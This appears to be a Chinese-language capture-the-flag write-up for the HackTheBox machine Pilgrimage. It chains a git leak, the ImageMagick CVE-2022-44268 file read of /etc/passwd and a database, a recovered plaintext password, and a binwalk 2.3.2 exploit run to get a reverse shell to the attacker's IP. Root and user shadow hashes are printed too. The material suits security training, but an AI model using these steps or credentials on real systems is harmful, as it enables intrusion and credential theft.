基本信息

https://app.hackthebox.com/machines/Pilgrimage
10.10.11.219

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 13:22 CST
Nmap scan report for 10.10.11.219
Host is up (0.098s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE   VERSION
22/tcp    open     ssh       OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp    open     http      nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
13783/tcp filtered netbackup
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

需要加hosts：

1	10.10.11.219 pilgrimage.htb

在线压缩图片的：

自己注册登录后测试功能就是上传图片，给出压缩后的图片

.git

很容易发现git泄漏：

dump代码分析：

1	git-dumper http://pilgrimage.htb/.git git_dump

magick

根据代码可以知道图像处理是使用的magick，我们dump也得到有这个文件，是一个linux elf，测试运行发现是ImageMagick 7.1.0-49：

ImageMagick

搜索可以发现相关漏洞：

ImageMagick: The hidden vulnerability behind your online images - Metabase Q
https://www.metabaseq.com/imagemagick-zero-days/
voidz0r/CVE-2022-44268: A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read
https://github.com/voidz0r/CVE-2022-44268

就是按照readme 一步步来，本地用到了identify需要装一下imagemagick：

cargo run "/etc/passwd"

brew install imagemagick
identify -verbose 649924974daec.png

db

根据前面代码中得到的sqlite数据库路径，读取数据库文件：

1
2
3

cargo run "/var/db/pilgrimage"

identify -verbose 649928a02e497.png

结合前面passwd得到的用户名emily，分隔出密码(也可以解码后内容作为sqlite文件读取)：

1	emily abigchonkyboi123

user flag

得到的账号密码登录，得到user flag:

(目录下那些binwalk是别人放的)

提权信息

运行pspy,发现root定时运行malwarescan.sh：

malwarescan.sh

查看代码，发现是对shrunk目录下的文件运行binwalk后进行检测，满足条件就删除：

binwalk

binwalk 2.3.2版本，存在已知漏洞：

Security Advisory: Remote Command Execution in binwalk - ONEKEY
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/
Binwalk v2.3.2 - Remote Command Execution (RCE) - Python remote Exploit
https://www.exploit-db.com/exploits/51249

提权 & root flag

按照exp说明一步步来：

python3 51249.py image.png 10.10.14.11 4444

# target
cd /var/www/pilgrimage.htb/shrunk/
wget http://10.10.14.11:7777/binwalk_exploit.png

触发，得到root：

shadow

1 2	root:$y$j9T$wlP.1uHMf0rRNBijw8HHv.$LLm1qK9ISnryNLz6wa0asgaOotvT7nbGC7py0d5nYoD:19398:0:99999:7::: emily:$y$j9T$ktYE1a41rPMM9Qc8UOjaz0$kQrcvH7mLwn/xsppIViwVr01zcx8jFQWK4pl7lQicq0:19412:0:99999:7:::

参考资料

arthaud/git-dumper: A tool to dump a git repository from a website
https://github.com/arthaud/git-dumper
ImageMagick: The hidden vulnerability behind your online images - Metabase Q
https://www.metabaseq.com/imagemagick-zero-days/
voidz0r/CVE-2022-44268: A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read
https://github.com/voidz0r/CVE-2022-44268
Security Advisory: Remote Command Execution in binwalk - ONEKEY
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/
Binwalk v2.3.2 - Remote Command Execution (RCE) - Python remote Exploit
https://www.exploit-db.com/exploits/51249

Pilgrimage - HackTheBox

2023-06-26